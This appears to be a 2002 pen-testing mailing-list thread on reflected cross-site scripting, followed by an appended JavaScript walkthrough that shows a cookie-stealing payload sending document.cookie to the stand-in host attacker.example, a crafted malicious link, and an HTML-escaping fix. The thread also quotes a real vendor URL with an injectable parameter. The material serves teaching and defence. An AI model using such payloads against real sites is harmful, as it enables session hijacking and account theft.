I'm sorry I didn't explain my point as well as I'd hoped. If the site doesn't have storage, or doesn't need to worry about cookies (no store), what is the point in being able to inject things? Sure, if you send an email with a link in it, they'll get taken to another site, but my understanding was it was as if information was stored in a database so that an unknowing user could fall into it. Do I have the wrong idea of XSS in my head, or does it cover both situations?

-----Original Message-----
From: Kevin Spett [mailto:kspettat_private]
Sent: Wednesday, August 07, 2002 2:38 PM
To: Matt Andreko; pen-testat_private
Subject: Re: Cross Site Scripting Vulnerabilities - XSS

If you were really trying to exploit an XSS issue, you wouldn't make a pop-up box... people just use that to test for it. You would do something like silently send an HTTP request containing the cookie value to another site, so that the person (or program) at the other end would be able to hijack the session.

Kevin Spett
SPI Dynamics, Inc.
http://www.spidynamics.com/

----- Original Message -----
From: "Matt Andreko" <mandrekoat_private>
To: "'Bill Pennington'" <billpat_private>; <pen-testat_private>
Sent: Tuesday, August 06, 2002 5:56 PM
Subject: RE: Cross Site Scripting Vulnerabilities - XSS

> I am kinda new to XSS, but am intrigued by how it works. I have found
> sometimes you can get javascript messages to pop up and such, but if
> it's not being stored in a database, what good is it?
>
> Take for example Iwillusa.com (a motherboard maker's website). They
> have a product page that I saw had some html in the URL:
> http://www.iwillusa.com/products/spec.asp?ModelName=DVD266>u</i>-RN&SupportID=
> I edited it and it became:
> http://www.iwillusa.com/products/spec.asp?ModelName=DVD266u-RN
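The exchange above, as an added example that is not part of the thread and not code from any of its participants: a page that reflects a query parameter into its HTML, the pop-up payload testers use, the silent cookie-stealing payload Kevin describes, and the output-encoding fix. It also answers Matt's question about storage: nothing is saved on the target site, the payload rides in the link and is reflected back on every visit. The hosts vulnerable.example and attacker.example, the function names, and the sample session cookie are all assumptions for illustration; the in-memory "browser" only models inline scripts, image requests and alert().

```javascript
// Added example (not from the thread): reflected XSS end to end, in Node.js.
// Hypothetical names: vulnerable.example/spec.asp stands in for any page that
// echoes a query parameter; attacker.example/c is the attacker's collector.
const VULNERABLE_PAGE = 'http://vulnerable.example/spec.asp';   // hypothetical
const ATTACKER_COLLECTOR = 'http://attacker.example/c';          // hypothetical

// Server side, vulnerable: the ModelName parameter is written into the HTML
// as-is, so whatever the URL carries is rendered as markup and script.
function renderSpecPageVulnerable(modelName) {
  return `<html><body><h1>Specifications for ${modelName}</h1></body></html>`;
}

// Server side, fixed: HTML-encode untrusted text before placing it in element content.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, ch => map[ch]);
}
function renderSpecPageSafe(modelName) {
  return `<html><body><h1>Specifications for ${escapeHtml(modelName)}</h1></body></html>`;
}

// What testers inject: visible to the victim, useless to an attacker.
const TEST_PAYLOAD = '<script>alert(1)</script>';

// What an attacker injects: a silent request carrying document.cookie to a
// host they control. An image load needs no interaction and shows nothing.
function cookieStealPayload(collector) {
  return `<script>new Image().src="${collector}?c="+encodeURIComponent(document.cookie)</script>`;
}

// The link that gets e-mailed to the victim. Nothing is stored on the target
// site; the payload is in the URL and is reflected back by the server.
function craftLink(pageUrl, payload) {
  return `${pageUrl}?ModelName=${encodeURIComponent(payload)}`;
}

// Server-side parsing of the parameter (undoes the percent-encoding).
function extractModelName(url) {
  return new URL(url).searchParams.get('ModelName');
}

// Minimal model of the victim's browser: run each inline <script> with the
// victim's cookie in scope and record every URL the script tries to fetch.
function simulateVictimBrowser(html, cookie) {
  const requests = [];
  const alerts = [];
  class Image { set src(url) { requests.push(url); } }   // records the beacon URL
  const document = { cookie };
  const alert = msg => alerts.push(String(msg));
  const scriptRe = /<script>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = scriptRe.exec(html)) !== null) {
    // Execute the script body with the fake browser globals in scope.
    new Function('document', 'Image', 'alert', m[1])(document, Image, alert);
  }
  return { requests, alerts };
}

// End to end: attacker crafts link -> victim follows it -> server reflects the
// parameter -> victim's browser runs the script -> cookie reaches the collector.
function runAttack(render, cookie) {
  const link = craftLink(VULNERABLE_PAGE, cookieStealPayload(ATTACKER_COLLECTOR));
  const html = render(extractModelName(link));
  return simulateVictimBrowser(html, cookie);
}

const SAMPLE_COOKIE = 'ASPSESSIONID=abc123';   // constructed sample session cookie
console.log('vulnerable page, requests made:', runAttack(renderSpecPageVulnerable, SAMPLE_COOKIE).requests);
console.log('fixed page, requests made:     ', runAttack(renderSpecPageSafe, SAMPLE_COOKIE).requests);
```

On the vulnerable page the victim's browser requests `http://attacker.example/c?c=ASPSESSIONID%3Dabc123`, which is all the attacker needs to replay the session; on the fixed page the injected text is rendered as literal characters and no request leaves the browser. The encoding here is for HTML element content only; a parameter echoed into an attribute, a script block or a URL needs the encoding appropriate to that context.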